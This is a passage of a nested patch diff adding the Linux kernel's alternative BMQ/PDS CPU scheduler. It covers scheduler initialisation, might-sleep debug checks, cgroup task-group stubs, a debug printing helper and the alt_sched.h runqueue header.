-+early_initcall(migration_init);
-+
-+#else
-+void __init sched_init_smp(void)
-+{
-+	cpu_rq(0)->idle->time_slice = sched_timeslice_ns;
-+}
-+#endif /* CONFIG_SMP */
-+
-+int in_sched_functions(unsigned long addr)
-+{
-+	return in_lock_functions(addr) ||
-+		(addr >= (unsigned long)__sched_text_start
-+		&& addr < (unsigned long)__sched_text_end);
-+}
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+/* task group related information */
-+struct task_group {
-+	struct cgroup_subsys_state css;
-+
-+	struct rcu_head rcu;
-+	struct list_head list;
-+
-+	struct task_group *parent;
-+	struct list_head siblings;
-+	struct list_head children;
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	unsigned long		shares;
-+#endif
-+};
-+
-+/*
-+ * Default task group.
-+ * Every task in system belongs to this group at bootup.
-+ */
-+struct task_group root_task_group;
-+LIST_HEAD(task_groups);
-+
-+/* Cacheline aligned slab cache for task_group */
-+static struct kmem_cache *task_group_cache __read_mostly;
-+#endif /* CONFIG_CGROUP_SCHED */
-+
-+void __init sched_init(void)
-+{
-+	int i;
-+	struct rq *rq;
-+
-+	printk(KERN_INFO ALT_SCHED_VERSION_MSG);
-+
-+	wait_bit_init();
-+
-+#ifdef CONFIG_SMP
-+	for (i = 0; i < SCHED_QUEUE_BITS; i++)
-+		cpumask_copy(sched_preempt_mask + i, cpu_present_mask);
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+	task_group_cache = KMEM_CACHE(task_group, 0);
-+
-+	list_add(&root_task_group.list, &task_groups);
-+	INIT_LIST_HEAD(&root_task_group.children);
-+	INIT_LIST_HEAD(&root_task_group.siblings);
-+#endif /* CONFIG_CGROUP_SCHED */
-+	for_each_possible_cpu(i) {
-+		rq = cpu_rq(i);
-+
-+		sched_queue_init(&rq->queue);
-+		rq->prio = IDLE_TASK_SCHED_PRIO;
-+		rq->skip = NULL;
-+
-+		raw_spin_lock_init(&rq->lock);
-+		rq->nr_running = rq->nr_uninterruptible = 0;
-+		rq->calc_load_active = 0;
-+		rq->calc_load_update = jiffies + LOAD_FREQ;
-+#ifdef CONFIG_SMP
-+		rq->online = false;
-+		rq->cpu = i;
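-+/*
-+ * Example: booting with "preempt=voluntary" runs setup_preempt_mode(),
-+ * which maps the string via sched_dynamic_mode() and then calls
-+ * sched_dynamic_update(preempt_dynamic_voluntary) to patch the static
-+ * calls/keys listed above.
-+ */
-+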
-+
-+#ifdef CONFIG_SCHED_SMT
-+		rq->active_balance = 0;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+		INIT_CSD(&rq->nohz_csd, nohz_csd_func, rq);
-+#endif
-+		rq->balance_callback = &balance_push_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+		rcuwait_init(&rq->hotplug_wait);
-+#endif
-+#endif /* CONFIG_SMP */
-+		rq->nr_switches = 0;
-+
-+		hrtick_rq_init(rq);
-+		atomic_set(&rq->nr_iowait, 0);
-+	}
-+#ifdef CONFIG_SMP
-+	/* Set rq->online for cpu 0 */
-+	cpu_rq(0)->online = true;
-+#endif
-+	/*
-+	 * The boot idle thread does lazy MMU switching as well:
-+	 */
-+	mmgrab(&init_mm);
-+	enter_lazy_tlb(&init_mm, current);
-+
-+	/*
-+	 * The idle task doesn't need the kthread struct to function, but it
-+	 * is dressed up as a per-CPU kthread and thus needs to play the part
-+	 * if we want to avoid special-casing it in code that deals with per-CPU
-+	 * kthreads.
-+	 */
-+	WARN_ON(!set_kthread_struct(current));
-+
-+	/*
-+	 * Make us the idle thread. Technically, schedule() should not be
-+	 * called from this thread, however somewhere below it might be,
-+	 * but because we are the idle thread, we just pick up running again
-+	 * when this runqueue becomes "idle".
-+	 */
-+	init_idle(current, smp_processor_id());
-+
-+	calc_load_update = jiffies + LOAD_FREQ;
-+
-+#ifdef CONFIG_SMP
-+	idle_thread_set_boot_cpu();
-+	balance_push_set(smp_processor_id(), false);
-+
-+	sched_init_topology_cpumask_early();
-+#endif /* SMP */
-+
-+	psi_init();
-+
-+	preempt_dynamic_init();
-+}
-+
-+#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
-+
-+void __might_sleep(const char *file, int line)
-+{
-+	unsigned int state = get_current_state();
-+	/*
-+	 * Blocking primitives will set (and therefore destroy) current->state,
-+	 * since we will exit with TASK_RUNNING make sure we enter with it,
-+	 * otherwise we will destroy state.
-+	 */
-+	WARN_ONCE(state != TASK_RUNNING && current->task_state_change,
-+			"do not call blocking ops when !TASK_RUNNING; "
-+			"state=%x set at [<%p>] %pS\n", state,
-+			(void *)current->task_state_change,
-+			(void *)current->task_state_change);
-+
-+	__might_resched(file, line, 0);
-+}
-+EXPORT_SYMBOL(__might_sleep);
-+
-+static void print_preempt_disable_ip(int preempt_offset, unsigned long ip)
-+{
-+	if (!IS_ENABLED(CONFIG_DEBUG_PREEMPT))
-+		return;
-+
-+	if (preempt_count() == preempt_offset)
-+		return;
-+
-+	pr_err("Preemption disabled at:");
-+	print_ip_sym(KERN_ERR, ip);
-+}
-+
-+static inline bool resched_offsets_ok(unsigned int offsets)
-+{
-+	unsigned int nested = preempt_count();
-+
-+	nested += rcu_preempt_depth() << MIGHT_RESCHED_RCU_SHIFT;
-+
-+	return nested == offsets;
-+}
-+
-+void __might_resched(const char *file, int line, unsigned int offsets)
-+{
-+	/* Ratelimiting timestamp: */
-+	static unsigned long prev_jiffy;
-+
-+	unsigned long preempt_disable_ip;
-+
-+	/* WARN_ON_ONCE() by default, no rate limit required: */
-+	rcu_sleep_check();
-+
-+	if ((resched_offsets_ok(offsets) && !irqs_disabled() &&
-+	     !is_idle_task(current) && !current->non_block_count) ||
-+	    system_state == SYSTEM_BOOTING || system_state > SYSTEM_RUNNING ||
-+	    oops_in_progress)
-+		return;
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	/* Save this before calling printk(), since that will clobber it: */
-+	preempt_disable_ip = get_preempt_disable_ip(current);
-+
-+	pr_err("BUG: sleeping function called from invalid context at %s:%d\n",
-+	       file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, non_block: %d, pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), current->non_block_count,
-+	       current->pid, current->comm);
-+	pr_err("preempt_count: %x, expected: %x\n", preempt_count(),
-+	       offsets & MIGHT_RESCHED_PREEMPT_MASK);
-+
-+	if (IS_ENABLED(CONFIG_PREEMPT_RCU)) {
-+		pr_err("RCU nest depth: %d, expected: %u\n",
-+		       rcu_preempt_depth(), offsets >> MIGHT_RESCHED_RCU_SHIFT);
-+	}
-+
-+	if (task_stack_end_corrupted(current))
-+		pr_emerg("Thread overran stack, or stack corrupted\n");
-+
-+	debug_show_held_locks(current);
-+	if (irqs_disabled())
-+		print_irqtrace_events(current);
-+
-+	print_preempt_disable_ip(offsets & MIGHT_RESCHED_PREEMPT_MASK,
-+				 preempt_disable_ip);
-+
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL(__might_resched);
-+
-+void __cant_sleep(const char *file, int line, int preempt_offset)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > preempt_offset)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	printk(KERN_ERR "BUG: assuming atomic context at %s:%d\n", file, line);
-+	printk(KERN_ERR "in_atomic(): %d, irqs_disabled(): %d, pid: %d, name: %s\n",
-+			in_atomic(), irqs_disabled(),
-+			current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_sleep);
-+
-+#ifdef CONFIG_SMP
-+void __cant_migrate(const char *file, int line)
-+{
-+	static unsigned long prev_jiffy;
-+
-+	if (irqs_disabled())
-+		return;
-+
-+	if (is_migration_disabled(current))
-+		return;
-+
-+	if (!IS_ENABLED(CONFIG_PREEMPT_COUNT))
-+		return;
-+
-+	if (preempt_count() > 0)
-+		return;
-+
-+	if (current->migration_flags & MDF_FORCE_ENABLED)
-+		return;
-+
-+	if (time_before(jiffies, prev_jiffy + HZ) && prev_jiffy)
-+		return;
-+	prev_jiffy = jiffies;
-+
-+	pr_err("BUG: assuming non migratable context at %s:%d\n", file, line);
-+	pr_err("in_atomic(): %d, irqs_disabled(): %d, migration_disabled() %u pid: %d, name: %s\n",
-+	       in_atomic(), irqs_disabled(), is_migration_disabled(current),
-+	       current->pid, current->comm);
-+
-+	debug_show_held_locks(current);
-+	dump_stack();
-+	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
-+}
-+EXPORT_SYMBOL_GPL(__cant_migrate);
-+#endif
-+#endif
-+
-+#ifdef CONFIG_MAGIC_SYSRQ
-+void normalize_rt_tasks(void)
-+{
-+	struct task_struct *g, *p;
-+	struct sched_attr attr = {
-+		.sched_policy = SCHED_NORMAL,
-+	};
-+
-+	read_lock(&tasklist_lock);
-+	for_each_process_thread(g, p) {
-+		/*
-+		 * Only normalize user tasks:
-+		 */
-+		if (p->flags & PF_KTHREAD)
-+			continue;
-+
-+		schedstat_set(p->stats.wait_start,  0);
-+		schedstat_set(p->stats.sleep_start, 0);
-+		schedstat_set(p->stats.block_start, 0);
-+
-+		if (!rt_task(p)) {
-+			/*
-+			 * Renice negative nice level userspace
-+			 * tasks back to 0:
-+			 */
-+			if (task_nice(p) < 0)
-+				set_user_nice(p, 0);
-+			continue;
-+		}
-+
-+		__sched_setscheduler(p, &attr, false, false);
-+	}
-+	read_unlock(&tasklist_lock);
-+}
-+#endif /* CONFIG_MAGIC_SYSRQ */
-+
-+#if defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB)
-+/*
-+ * These functions are only useful for the IA64 MCA handling, or kdb.
-+ *
-+ * They can only be called when the whole system has been
-+ * stopped - every CPU needs to be quiescent, and no scheduling
-+ * activity can take place. Using them for anything else would
-+ * be a serious bug, and as a result, they aren't even visible
-+ * under any other configuration.
-+ */
-+
-+/**
-+ * curr_task - return the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ *
-+ * Return: The current task for @cpu.
-+ */
-+struct task_struct *curr_task(int cpu)
-+{
-+	return cpu_curr(cpu);
-+}
-+
-+#endif /* defined(CONFIG_IA64) || defined(CONFIG_KGDB_KDB) */
-+
-+#ifdef CONFIG_IA64
-+/**
-+ * ia64_set_curr_task - set the current task for a given CPU.
-+ * @cpu: the processor in question.
-+ * @p: the task pointer to set.
-+ *
-+ * Description: This function must only be used when non-maskable interrupts
-+ * are serviced on a separate stack.  It allows the architecture to switch the
-+ * notion of the current task on a CPU in a non-blocking manner.  This function
-+ * must be called with all CPUs synchronised and interrupts disabled, and
-+ * the caller must save the original value of the current task (see
-+ * curr_task() above) and restore that value before reenabling interrupts and
-+ * re-starting the system.
-+ *
-+ * ONLY VALID WHEN THE WHOLE SYSTEM IS STOPPED!
-+ */
-+void ia64_set_curr_task(int cpu, struct task_struct *p)
-+{
-+	cpu_curr(cpu) = p;
-+}
-+
-+#endif
-+
-+#ifdef CONFIG_CGROUP_SCHED
-+static void sched_free_group(struct task_group *tg)
-+{
-+	kmem_cache_free(task_group_cache, tg);
-+}
-+
-+static void sched_free_group_rcu(struct rcu_head *rhp)
-+{
-+	sched_free_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+static void sched_unregister_group(struct task_group *tg)
-+{
-+	/*
-+	 * We have to wait for yet another RCU grace period to expire, as
-+	 * print_cfs_stats() might run concurrently.
-+	 */
-+	call_rcu(&tg->rcu, sched_free_group_rcu);
-+}
-+
-+/* allocate runqueue etc for a new task group */
-+struct task_group *sched_create_group(struct task_group *parent)
-+{
-+	struct task_group *tg;
-+
-+	tg = kmem_cache_alloc(task_group_cache, GFP_KERNEL | __GFP_ZERO);
-+	if (!tg)
-+		return ERR_PTR(-ENOMEM);
-+
-+	return tg;
-+}
-+
-+void sched_online_group(struct task_group *tg, struct task_group *parent)
-+{
-+}
-+
-+/* rcu callback to free various structures associated with a task group */
-+static void sched_unregister_group_rcu(struct rcu_head *rhp)
-+{
-+	/* Now it should be safe to free those cfs_rqs: */
-+	sched_unregister_group(container_of(rhp, struct task_group, rcu));
-+}
-+
-+void sched_destroy_group(struct task_group *tg)
-+{
-+	/* Wait for possible concurrent references to cfs_rqs complete: */
-+	call_rcu(&tg->rcu, sched_unregister_group_rcu);
-+}
-+
-+void sched_release_group(struct task_group *tg)
-+{
-+}
-+
-+static inline struct task_group *css_tg(struct cgroup_subsys_state *css)
-+{
-+	return css ? container_of(css, struct task_group, css) : NULL;
-+}
-+
-+static struct cgroup_subsys_state *
-+cpu_cgroup_css_alloc(struct cgroup_subsys_state *parent_css)
-+{
-+	struct task_group *parent = css_tg(parent_css);
-+	struct task_group *tg;
-+
-+	if (!parent) {
-+		/* This is early initialization for the top cgroup */
-+		return &root_task_group.css;
-+	}
-+
-+	tg = sched_create_group(parent);
-+	if (IS_ERR(tg))
-+		return ERR_PTR(-ENOMEM);
-+	return &tg->css;
-+}
-+
-+/* Expose task group only after completing cgroup initialization */
-+static int cpu_cgroup_css_online(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+	struct task_group *parent = css_tg(css->parent);
-+
-+	if (parent)
-+		sched_online_group(tg, parent);
-+	return 0;
-+}
-+
-+static void cpu_cgroup_css_released(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	sched_release_group(tg);
-+}
-+
-+static void cpu_cgroup_css_free(struct cgroup_subsys_state *css)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	/*
-+	 * Relies on the RCU grace period between css_released() and this.
-+	 */
-+	sched_unregister_group(tg);
-+}
-+
-+#ifdef CONFIG_RT_GROUP_SCHED
-+static int cpu_cgroup_can_attach(struct cgroup_taskset *tset)
-+{
-+	return 0;
-+}
-+#endif
-+
-+static void cpu_cgroup_attach(struct cgroup_taskset *tset)
-+{
-+}
-+
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+static DEFINE_MUTEX(shares_mutex);
-+
-+int sched_group_set_shares(struct task_group *tg, unsigned long shares)
-+{
-+	/*
-+	 * We can't change the weight of the root cgroup.
-+	 */
-+	if (&root_task_group == tg)
-+		return -EINVAL;
-+
-+	shares = clamp(shares, scale_load(MIN_SHARES), scale_load(MAX_SHARES));
-+
-+	mutex_lock(&shares_mutex);
-+	if (tg->shares == shares)
-+		goto done;
-+
-+	tg->shares = shares;
-+done:
-+	mutex_unlock(&shares_mutex);
-+	return 0;
-+}
-+
-+static int cpu_shares_write_u64(struct cgroup_subsys_state *css,
-+				struct cftype *cftype, u64 shareval)
-+{
-+	if (shareval > scale_load_down(ULONG_MAX))
-+		shareval = MAX_SHARES;
-+	return sched_group_set_shares(css_tg(css), scale_load(shareval));
-+}
-+
-+static u64 cpu_shares_read_u64(struct cgroup_subsys_state *css,
-+			       struct cftype *cft)
-+{
-+	struct task_group *tg = css_tg(css);
-+
-+	return (u64) scale_load_down(tg->shares);
-+}
-+#endif
-+
-+static struct cftype cpu_legacy_files[] = {
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+	{
-+		.name = "shares",
-+		.read_u64 = cpu_shares_read_u64,
-+		.write_u64 = cpu_shares_write_u64,
-+	},
-+#endif
-+	{ }	/* Terminate */
-+};
-+
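-+/*
-+ * Example (cgroup v1; the mount point may vary): writing to the cpu.shares
-+ * file declared above, e.g.
-+ *   echo 2048 > /sys/fs/cgroup/cpu/<group>/cpu.shares
-+ * lands in cpu_shares_write_u64() -> sched_group_set_shares().  Note that
-+ * this scheduler only records the value; it does not weight scheduling
-+ * decisions by it.
-+ */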
-+
-+static struct cftype cpu_files[] = {
-+	{ }	/* terminate */
-+};
-+
-+static int cpu_extra_stat_show(struct seq_file *sf,
-+			       struct cgroup_subsys_state *css)
-+{
-+	return 0;
-+}
-+
-+struct cgroup_subsys cpu_cgrp_subsys = {
-+	.css_alloc	= cpu_cgroup_css_alloc,
-+	.css_online	= cpu_cgroup_css_online,
-+	.css_released	= cpu_cgroup_css_released,
-+	.css_free	= cpu_cgroup_css_free,
-+	.css_extra_stat_show = cpu_extra_stat_show,
-+#ifdef CONFIG_RT_GROUP_SCHED
-+	.can_attach	= cpu_cgroup_can_attach,
-+#endif
-+	.attach		= cpu_cgroup_attach,
-+	.legacy_cftypes	= cpu_legacy_files,
-+	.dfl_cftypes	= cpu_files,
-+	.early_init	= true,
-+	.threaded	= true,
-+};
-+#endif	/* CONFIG_CGROUP_SCHED */
-+
-+#undef CREATE_TRACE_POINTS
-diff --git a/kernel/sched/alt_debug.c b/kernel/sched/alt_debug.c
-new file mode 100644
-index 000000000000..1212a031700e
---- /dev/null
-+++ b/kernel/sched/alt_debug.c
-@@ -0,0 +1,31 @@
-+/*
-+ * kernel/sched/alt_debug.c
-+ *
-+ * Print the alt scheduler debugging details
-+ *
-+ * Author: Alfred Chen
-+ * Date  : 2020
-+ */
-+#include "sched.h"
-+
-+/*
-+ * This allows printing both to /proc/sched_debug and
-+ * to the console
-+ */
-+#define SEQ_printf(m, x...)			\
-+ do {						\
-+	if (m)					\
-+		seq_printf(m, x);		\
-+	else					\
-+		pr_cont(x);			\
-+ } while (0)
-+
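-+/*
-+ * Usage: called with a seq_file (the /proc/sched_debug path) SEQ_printf()
-+ * behaves like seq_printf(); called with m == NULL (console dump paths)
-+ * it falls back to pr_cont(), so the same format strings serve both
-+ * sinks, e.g.:
-+ *
-+ *	SEQ_printf(m, "%s (%d)\n", p->comm, task_pid_nr(p));
-+ */
-+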
-+void proc_sched_show_task(struct task_struct *p, struct pid_namespace *ns,
-+			  struct seq_file *m)
-+{
-+	SEQ_printf(m, "%s (%d, #threads: %d)\n", p->comm, task_pid_nr_ns(p, ns),
-+						get_nr_threads(p));
-+}
-+
-+void proc_sched_set_task(struct task_struct *p)
-+{}
-diff --git a/kernel/sched/alt_sched.h b/kernel/sched/alt_sched.h
-new file mode 100644
-index 000000000000..c32403ed82b6
---- /dev/null
-+++ b/kernel/sched/alt_sched.h
-@@ -0,0 +1,668 @@
-+#ifndef ALT_SCHED_H
-+#define ALT_SCHED_H
-+
-+#include <linux/context_tracking.h>
-+#include <linux/profile.h>
-+#include <linux/psi.h>
-+#include <linux/stop_machine.h>
-+#include <linux/syscalls.h>
-+#include <linux/tick.h>
-+
-+#include <trace/events/power.h>
-+#include <trace/events/sched.h>
-+
-+#include "../workqueue_internal.h"
-+
-+#include "cpupri.h"
-+
-+#ifdef CONFIG_SCHED_BMQ
-+/* bits:
-+ * RT(0-99), (Low prio adj range, nice width, high prio adj range) / 2, cpu idle task */
-+#define SCHED_BITS	(MAX_RT_PRIO + NICE_WIDTH / 2 + MAX_PRIORITY_ADJ + 1)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+/* bits: RT(0-99), reserved(100-127), NORMAL_PRIO_NUM, cpu idle task */
-+#define SCHED_BITS	(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM + 1)
-+#endif /* CONFIG_SCHED_PDS */
-+
-+#define IDLE_TASK_SCHED_PRIO	(SCHED_BITS - 1)
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+# define SCHED_WARN_ON(x)	WARN_ONCE(x, #x)
-+extern void resched_latency_warn(int cpu, u64 latency);
-+#else
-+# define SCHED_WARN_ON(x)	({ (void)(x), 0; })
-+static inline void resched_latency_warn(int cpu, u64 latency) {}
-+#endif
-+
-+/*
-+ * Increase resolution of nice-level calculations for 64-bit architectures.
-+ * The extra resolution improves shares distribution and load balancing of
-+ * low-weight task groups (eg. nice +19 on an autogroup), deeper taskgroup
-+ * hierarchies, especially on larger systems. This is not a user-visible change
-+ * and does not change the user-interface for setting shares/weights.
-+ *
-+ * We increase resolution only if we have enough bits to allow this increased
-+ * resolution (i.e. 64-bit). The costs for increasing resolution when 32-bit
-+ * are pretty high and the returns do not justify the increased costs.
-+ *
-+ * Really only required when CONFIG_FAIR_GROUP_SCHED=y is also set, but to
-+ * increase coverage and consistency always enable it on 64-bit platforms.
-+ */
-+#ifdef CONFIG_64BIT
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT + SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		((w) << SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load_down(w) \
-+({ \
-+	unsigned long __w = (w); \
-+	if (__w) \
-+		__w = max(2UL, __w >> SCHED_FIXEDPOINT_SHIFT); \
-+	__w; \
-+})
-+#else
-+# define NICE_0_LOAD_SHIFT	(SCHED_FIXEDPOINT_SHIFT)
-+# define scale_load(w)		(w)
-+# define scale_load_down(w)	(w)
-+#endif
-+
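-+/*
-+ * Worked example on 64-bit (SCHED_FIXEDPOINT_SHIFT == 10):
-+ *   scale_load(1024)         == 1024 << 10 == 1048576
-+ *   scale_load_down(1048576) == 1048576 >> 10 == 1024
-+ *   scale_load_down(1)       == max(2UL, 1 >> 10) == 2, the non-zero
-+ *                               clamp that avoids zero weights.
-+ */
-+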
-+#ifdef CONFIG_FAIR_GROUP_SCHED
-+#define ROOT_TASK_GROUP_LOAD	NICE_0_LOAD
-+
-+/*
-+ * A weight of 0 or 1 can cause arithmetic problems.
-+ * The weight of a cfs_rq is the sum of the weights of the entities
-+ * queued on it, so the weight of a single entity must not be too
-+ * large; the same goes for the shares value of a task group.
-+ * (The default weight is 1024 - so there's no practical
-+ *  limitation from this.)
-+ */
-+#define MIN_SHARES		(1UL <<  1)
-+#define MAX_SHARES		(1UL << 18)
-+#endif
-+
-+/*
-+ * Tunables that become constants when CONFIG_SCHED_DEBUG is off:
-+ */
-+#ifdef CONFIG_SCHED_DEBUG
-+# define const_debug __read_mostly
-+#else
-+# define const_debug const
-+#endif
-+
-+/* task_struct::on_rq states: */
-+#define TASK_ON_RQ_QUEUED	1
-+#define TASK_ON_RQ_MIGRATING	2
-+
-+static inline int task_on_rq_queued(struct task_struct *p)
-+{
-+	return p->on_rq == TASK_ON_RQ_QUEUED;
-+}
-+
-+static inline int task_on_rq_migrating(struct task_struct *p)
-+{
-+	return READ_ONCE(p->on_rq) == TASK_ON_RQ_MIGRATING;
-+}
-+
-+/*
-+ * wake flags
-+ */
-+#define WF_SYNC		0x01		/* waker goes to sleep after wakeup */
-+#define WF_FORK		0x02		/* child wakeup after fork */
-+#define WF_MIGRATED	0x04		/* internal use, task got migrated */
-+
-+#define SCHED_QUEUE_BITS	(SCHED_BITS - 1)
-+
-+struct sched_queue {
-+	DECLARE_BITMAP(bitmap, SCHED_QUEUE_BITS);
-+	struct list_head heads[SCHED_BITS];
-+};
-+
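-+/*
-+ * The queue above is a classic bitmap-indexed priority array: roughly,
-+ * bit n of @bitmap is set iff heads[n] is non-empty, so the best (lowest
-+ * numbered, hence highest priority) runnable task is found with a
-+ * find-first-bit over @bitmap followed by a list_first_entry() on the
-+ * matching head (the lookup helpers live in the scheduler core).
-+ */
-+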
-+struct rq;
-+struct balance_callback {
-+	struct balance_callback *next;
-+	void (*func)(struct rq *rq);
-+};
-+
-+/*
-+ * This is the main, per-CPU runqueue data structure.
-+ * This data should only be modified by the local cpu.
-+ */
-+struct rq {
-+	/* runqueue lock: */
-+	raw_spinlock_t lock;
-+
-+	struct task_struct __rcu *curr;
-+	struct task_struct *idle, *stop, *skip;
-+	struct mm_struct *prev_mm;
-+
-+	struct sched_queue	queue;
-+#ifdef CONFIG_SCHED_PDS
-+	u64			time_edge;
-+#endif
-+	unsigned long prio;
-+
-+	/* switch count */
-+	u64 nr_switches;
-+
-+	atomic_t nr_iowait;
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+	u64 last_seen_need_resched_ns;
-+	int ticks_without_resched;
-+#endif
-+
-+#ifdef CONFIG_MEMBARRIER
-+	int membarrier_state;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+	int cpu;		/* cpu of this runqueue */
-+	bool online;
-+
-+	unsigned int		ttwu_pending;
-+	unsigned char		nohz_idle_balance;
-+	unsigned char		idle_balance;
-+
-+#ifdef CONFIG_HAVE_SCHED_AVG_IRQ
-+	struct sched_avg	avg_irq;
-+#endif
-+
-+#ifdef CONFIG_SCHED_SMT
-+	int active_balance;
-+	struct cpu_stop_work	active_balance_work;
-+#endif
-+	struct balance_callback	*balance_callback;
-+#ifdef CONFIG_HOTPLUG_CPU
-+	struct rcuwait		hotplug_wait;
-+#endif
-+	unsigned int		nr_pinned;
-+
-+#endif /* CONFIG_SMP */
-+#ifdef CONFIG_IRQ_TIME_ACCOUNTING
-+	u64 prev_irq_time;
-+#endif /* CONFIG_IRQ_TIME_ACCOUNTING */
-+#ifdef CONFIG_PARAVIRT
-+	u64 prev_steal_time;
-+#endif /* CONFIG_PARAVIRT */
-+#ifdef CONFIG_PARAVIRT_TIME_ACCOUNTING
-+	u64 prev_steal_time_rq;
-+#endif /* CONFIG_PARAVIRT_TIME_ACCOUNTING */
-+
-+	/* For general cpu load util */
-+	s32 load_history;
-+	u64 load_block;
-+	u64 load_stamp;
-+
-+	/* calc_load related fields */
-+	unsigned long calc_load_update;
-+	long calc_load_active;
-+
-+	u64 clock, last_tick;
-+	u64 last_ts_switch;
-+	u64 clock_task;
-+
-+	unsigned int  nr_running;
-+	unsigned long nr_uninterruptible;
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+#ifdef CONFIG_SMP
-+	call_single_data_t hrtick_csd;
-+#endif
-+	struct hrtimer		hrtick_timer;
-+	ktime_t			hrtick_time;
-+#endif
-+
-+#ifdef CONFIG_SCHEDSTATS
-+
-+	/* latency stats */
-+	struct sched_info rq_sched_info;
-+	unsigned long long rq_cpu_time;
-+	/* could above be rq->cfs_rq.exec_clock + rq->rt_rq.rt_runtime ? */
-+
-+	/* sys_sched_yield() stats */
-+	unsigned int yld_count;
-+
-+	/* schedule() stats */
-+	unsigned int sched_switch;
-+	unsigned int sched_count;
-+	unsigned int sched_goidle;
-+
-+	/* try_to_wake_up() stats */
-+	unsigned int ttwu_count;
-+	unsigned int ttwu_local;
-+#endif /* CONFIG_SCHEDSTATS */
-+
-+#ifdef CONFIG_CPU_IDLE
-+	/* Must be inspected within an RCU lock section */
-+	struct cpuidle_state *idle_state;
-+#endif
-+
-+#ifdef CONFIG_NO_HZ_COMMON
-+#ifdef CONFIG_SMP
-+	call_single_data_t	nohz_csd;
-+#endif
-+	atomic_t		nohz_flags;
-+#endif /* CONFIG_NO_HZ_COMMON */
-+};
-+
-+extern unsigned long rq_load_util(struct rq *rq, unsigned long max);
-+
-+extern unsigned long calc_load_update;
-+extern atomic_long_t calc_load_tasks;
-+
-+extern void calc_global_load_tick(struct rq *this_rq);
-+extern long calc_load_fold_active(struct rq *this_rq, long adjust);
-+
-+DECLARE_PER_CPU_SHARED_ALIGNED(struct rq, runqueues);
-+#define cpu_rq(cpu)		(&per_cpu(runqueues, (cpu)))
-+#define this_rq()		this_cpu_ptr(&runqueues)
-+#define task_rq(p)		cpu_rq(task_cpu(p))
-+#define cpu_curr(cpu)		(cpu_rq(cpu)->curr)
-+#define raw_rq()		raw_cpu_ptr(&runqueues)
-+
-+#ifdef CONFIG_SMP
-+#if defined(CONFIG_SCHED_DEBUG) && defined(CONFIG_SYSCTL)
-+void register_sched_domain_sysctl(void);
-+void unregister_sched_domain_sysctl(void);
-+#else
-+static inline void register_sched_domain_sysctl(void)
-+{
-+}
-+static inline void unregister_sched_domain_sysctl(void)
-+{
-+}
-+#endif
-+
-+extern bool sched_smp_initialized;
-+
-+enum {
-+	ITSELF_LEVEL_SPACE_HOLDER,
-+#ifdef CONFIG_SCHED_SMT
-+	SMT_LEVEL_SPACE_HOLDER,
-+#endif
-+	COREGROUP_LEVEL_SPACE_HOLDER,
-+	CORE_LEVEL_SPACE_HOLDER,
-+	OTHER_LEVEL_SPACE_HOLDER,
-+	NR_CPU_AFFINITY_LEVELS
-+};
-+
-+DECLARE_PER_CPU(cpumask_t [NR_CPU_AFFINITY_LEVELS], sched_cpu_topo_masks);
-+DECLARE_PER_CPU(cpumask_t *, sched_cpu_llc_mask);
-+
-+static inline int
-+__best_mask_cpu(const cpumask_t *cpumask, const cpumask_t *mask)
-+{
-+	int cpu;
-+
-+	while ((cpu = cpumask_any_and(cpumask, mask)) >= nr_cpu_ids)
-+		mask++;
-+
-+	return cpu;
-+}
-+
-+static inline int best_mask_cpu(int cpu, const cpumask_t *mask)
-+{
-+	return __best_mask_cpu(mask, per_cpu(sched_cpu_topo_masks, cpu));
-+}
-+
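-+/*
-+ * Illustration of the walk above: sched_cpu_topo_masks[cpu] is an array
-+ * ordered from narrowest to widest affinity level (the CPU itself, then
-+ * e.g. SMT siblings, LLC/coregroup, core, everything else).
-+ * __best_mask_cpu() tries each level in turn and returns the first CPU
-+ * present in both the caller's mask and that level, i.e. the "closest"
-+ * allowed CPU.
-+ */
-+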
-+extern void flush_smp_call_function_queue(void);
-+
-+#else  /* !CONFIG_SMP */
-+static inline void flush_smp_call_function_queue(void) { }
-+#endif
-+
-+#ifndef arch_scale_freq_tick
-+static __always_inline
-+void arch_scale_freq_tick(void)
-+{
-+}
-+#endif
-+
-+#ifndef arch_scale_freq_capacity
-+static __always_inline
-+unsigned long arch_scale_freq_capacity(int cpu)
-+{
-+	return SCHED_CAPACITY_SCALE;
-+}
-+#endif
-+
-+static inline u64 __rq_clock_broken(struct rq *rq)
-+{
